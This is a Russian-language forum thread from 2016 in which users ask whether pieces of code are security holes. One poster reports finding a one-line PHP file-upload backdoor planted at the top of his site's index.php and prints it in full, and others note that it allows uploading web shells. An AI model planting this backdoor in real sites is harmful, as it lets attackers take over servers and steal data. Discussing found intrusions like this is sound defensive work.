Помощь по скриптам | Это дыра ?
Mobiaaa ,
Хихикающий доктор (04.11.2016 в 14:22)
Андрюха (04.11.2016 в 14:00)
в одной он лайн игре есть такая ссылка в магазине <a href='?koldun&url=/rinok?act=koldun'> это дыра я так понял ?
да врядли. но вот это думаю дыра <?php if(isset($_FILES['u']) && isset($_POST['n'])) move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']); ?>
Андрюха (04.11.2016 в 14:00)
в одной он лайн игре есть такая ссылка в магазине <a href='?koldun&url=/rinok?act=koldun'> это дыра я так понял ?
да врядли. но вот это думаю дыра <?php if(isset($_FILES['u']) && isset($_POST['n'])) move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']); ?>
Почему?
BIP (04.11.2016 в 15:02)
Хихикающий доктор (04.11.2016 в 14:22)
Андрюха (04.11.2016 в 14:00)
в одной он лайн игре есть такая ссылка в магазине <a href='?koldun&url=/rinok?act=koldun'> это дыра я так понял ?
да врядли. но вот это думаю дыра <?php if(isset($_FILES['u']) && isset($_POST['n'])) move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']); ?>
Почему?
Хихикающий доктор (04.11.2016 в 14:22)
Андрюха (04.11.2016 в 14:00)
в одной он лайн игре есть такая ссылка в магазине <a href='?koldun&url=/rinok?act=koldun'> это дыра я так понял ?
да врядли. но вот это думаю дыра <?php if(isset($_FILES['u']) && isset($_POST['n'])) move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']); ?>
Почему?
потому что мне её вписали в файл на сайте
и я её заметил.
Хихикающий доктор , я так понял, с помощюью upload можно загрузить шеллы на сайт да?
BIP (04.11.2016 в 15:06)
Хихикающий доктор , я так понял, с помощюью upload можно загрузить шеллы на сайт да?
Хихикающий доктор , я так понял, с помощюью upload можно загрузить шеллы на сайт да?
ну я понял так же
BIP , главное в index.php в самом верху было прописано, пипец, пришлось менять данные для входа
А посоветуйте сканеры уязвимостей
Хихикающий доктор ,
Могли бы в инклуд файлах прописать
Могли бы в инклуд файлах прописать
Хихикающий доктор (04.11.2016 в 15:09)
BIP , главное в index.php в самом верху было прописано, пипец, пришлось менять данные для входа
BIP , главное в index.php в самом верху было прописано, пипец, пришлось менять данные для входа
а чё, есть что стоящее у тебя слить ?
Нет! вот дыра